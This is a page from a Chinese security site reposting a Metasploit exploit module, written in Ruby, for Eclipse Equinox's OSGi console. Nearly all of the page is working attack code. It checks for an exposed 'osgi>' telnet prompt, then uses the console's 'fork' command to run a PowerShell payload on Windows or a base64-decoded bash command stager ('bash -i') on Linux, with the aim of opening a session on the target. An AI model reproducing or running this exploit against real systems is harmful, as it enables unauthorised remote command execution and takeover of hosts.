首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Eclipse Equinoxe OSGi Console Command Execution
来源:metasploit.com 作者:Kaiser 发布时间:2018-03-08  
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'base64'

class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::Tcp
  include Msf::Exploit::CmdStager
  include Msf::Exploit::Powershell

  TELNET_IAC = Msf::Exploit::Remote::Telnet

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Eclipse Equinoxe OSGi Console Command Execution',
      'Description'    => %q{
        Exploit Eclipse Equinoxe OSGi (Open Service Gateway initiative) console
        'fork' command to execute arbitrary commands on the remote system..
      },
      'Author'         =>
        [
          'Quentin Kaiser <kaiserquentin@gmail.com>'
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
       [
         ['URL', 'https://www.eclipse.org/equinox/documents/quickstart-framework.php']
       ],
      'Platform' => %w{ linux win },
      'Arch' => [ARCH_ARMLE, ARCH_AARCH64, ARCH_X86, ARCH_X64],
      'Targets'=> [
        [ 'Linux (Bash Payload)', { 'Platform' => 'linux' } ],
        [ 'Windows (Powershell Payload)', { 'Platform' => 'win' } ]
       ],
      'CmdStagerFlavor' => [ 'bourne' ],
      'DisclosureDate'  => 'Feb 13 2018',
      'DefaultTarget'   => 0))
    deregister_options('SRVHOST', 'SRVPORT', 'SSL', 'SSLCert', 'URIPATH')
    register_options([
      OptInt.new('TIME_WAIT', [ true, 'Time to wait for payload to be executed', 20])
    ])
  end

  def check
    connect
    res = sock.get_once
    if res == TELNET_IAC::IAC+TELNET_IAC::WILL+TELNET_IAC::OPT_ECHO+\
        TELNET_IAC::IAC+TELNET_IAC::WILL+TELNET_IAC::OPT_SGA+\
        TELNET_IAC::IAC+TELNET_IAC::DO+TELNET_IAC::OPT_NAWS+\
        TELNET_IAC::IAC+TELNET_IAC::DO+TELNET_IAC::OPT_TTYPE
      # terminal type 'xterm-256color' = \x78\x74\x65\x72\x6D\x2D\x32\x35\x36\x63\x6F\x6C\x6F\x72
      sock.put(TELNET_IAC::IAC+TELNET_IAC::SB+TELNET_IAC::OPT_TTYPE+\
        "\x00xterm-256color"+TELNET_IAC::IAC+TELNET_IAC::SE)
      res = sock.get_once
    end
    disconnect
    if res && res == "osgi> "
      return Exploit::CheckCode::Vulnerable
    end
    Exploit::CheckCode::Safe
  end

  def exploit
    begin
      print_status("Accessing the OSGi console ...")

      unless check == Exploit::CheckCode::Vulnerable
        fail_with(Failure::NoTarget, "#{peer} - Failed to access the OSGi console")
      end

      if target['Platform'] == "win" then
        exec_command("fork \"#{cmd_psh_payload(payload.encoded, payload_instance.arch.first, {encode_final_payload: true, remove_comspec: true})}\"")
      else
        execute_cmdstager({:flavor => :bourne})
      end

      print_status("#{rhost}:#{rport} - Waiting for session...")

      (datastore['TIME_WAIT']).times do
        Rex.sleep(1)
        # Success! session is here!
        break if session_created?
      end
    rescue ::Timeout::Error, Rex::ConnectionError, Rex::ConnectionRefused, Rex::HostUnreachable, Rex::ConnectionTimeout => e
      fail_with(Failure::Unknown, "#{rhost}:#{rport} - #{e.message}")
    ensure
      disconnect
    end
  end

  def exec_command(cmd)
      connect
      res = sock.get_once
      if res == TELNET_IAC::IAC+TELNET_IAC::WILL+TELNET_IAC::OPT_ECHO+\
        TELNET_IAC::IAC+TELNET_IAC::WILL+TELNET_IAC::OPT_SGA+\
        TELNET_IAC::IAC+TELNET_IAC::DO+TELNET_IAC::OPT_NAWS+\
        TELNET_IAC::IAC+TELNET_IAC::DO+TELNET_IAC::OPT_TTYPE
        sock.put(TELNET_IAC::IAC+TELNET_IAC::SB+TELNET_IAC::OPT_TTYPE+\
          "\x00xterm-256color"+TELNET_IAC::IAC+TELNET_IAC::SE)
        res = sock.get_once
      end
      print_status("Exploiting...")
      sock.put("#{cmd}\r\n")
      res = sock.get
      sock.put("disconnect\r\n")
      res = sock.get
      sock.put("y\r\n")
  end

  def execute_command(cmd, opts={})
    cmd_b64 = Base64.encode64(cmd).gsub(/\s+/, "")
    # Runtime.getRuntime().exec() workaround on Linux. Requires bash.
    exec_command("fork \"bash -c {echo,#{cmd_b64}}|{base64,-d}|{bash,-i}\"")
  end
end

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Yahoo! Messenger Webcam 8.1 Ac
·Apache 2.2.0 - 2.2.11 Remote e
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
·HT Editor File openning Stack
  相关文章
·CloudMe Sync 1.9.2 Remote Buff
·WebLog Expert Web Server Enter
·Chrome V8 JIT JSBuiltinReducer
·Chrome V8 Out-Of-Bounds Read
·Chrome V8 JIT Optmization Bug
·Softros Network Time System Se
·Chrome V8 JIT GetSpecializatio
·Memcached - 'memcrashed' Denia
·Tenda AC15 Router - Pe-authent
·ActivePDF Toolkit < 8.1.0.1902
·Sophos UTM 9.410 - 'loginuser'
·Dup Scout Enterprise 10.5.12 -
  推荐广告
CopyRight © 2002-2018 VFocuS.Net All Rights Reserved